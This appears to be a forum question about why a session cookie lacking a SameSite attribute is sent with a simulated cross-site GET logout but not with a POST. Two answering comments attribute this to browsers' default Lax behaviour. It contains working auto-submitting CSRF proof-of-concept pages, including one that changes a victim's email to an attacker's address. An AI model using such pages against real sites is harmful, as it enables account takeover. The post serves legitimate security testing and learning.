# Session token without 'SameSite' attribute is not being included in the request when victim is lured to execute CSRF attack

Tags: session, session-cookies, csrf

I am simulating a Cross Site Request Forgery (CSRF) attack to site X. The site sets its session ID using:

```
Set-Cookie: PHPSESSID=abcdefg; path=/; HttpOnly
```

As there's no `SameSite` attribute defined, I'm expecting that this PHPSESSID will get sent along the request when user/victim is lured to execute CSRF, either using GET or POST method.

I use Burp to automatically generate CSRF PoC (proof-of-concept). Below are the HTML page used to lure user/victim to logout from their account, which uses GET method:

```html
<html>
  <body>
    <form action="https://site-x.com/logout">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

When authenticated user/victim opens the page above, it will send a request as follows, which successfully lure them to logout from their account.:

```
GET /logout? HTTP/1.1
Host: site-x.com
Cookie: PHPSESSID=abcdefg;
...
```

However, when I simulate the attack on a POST method, the PHPSESSID is not being sent along the request as what happens in the GET method above.

Here is the HTML page used to lure user/victim to change their email account, which uses POST method:

```html
<html>
  <body>
    <form action="https://site-x.com/profile" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="email" value="hacker@mail.com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

When authenticated user/victim opens it, the request wouldn't include its PHPSESSID in the request:

```
POST /profile HTTP/1.1
Host: site-x.com
...
```

As I stated, the PHPSESSID is not being sent in the POST request above. And once again, I expect it to get sent because the cookie doesn't have the `SameSite` attribute being set.

So, what is actually happening here? Am I missing something? Do I incorrectlly understand of how all this works?

Comment: Absence of `SameSite` means [`SameSite=Lax`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie#lax). Lax cookies are sent only with GET requests, not with POST requests (but see [here](https://stackoverflow.com/a/73098718/16462950)).

Comment: @HeikoTheißen Thank you for pointing that out! Then it's probably because the "Lax + POST" intervention from the browser.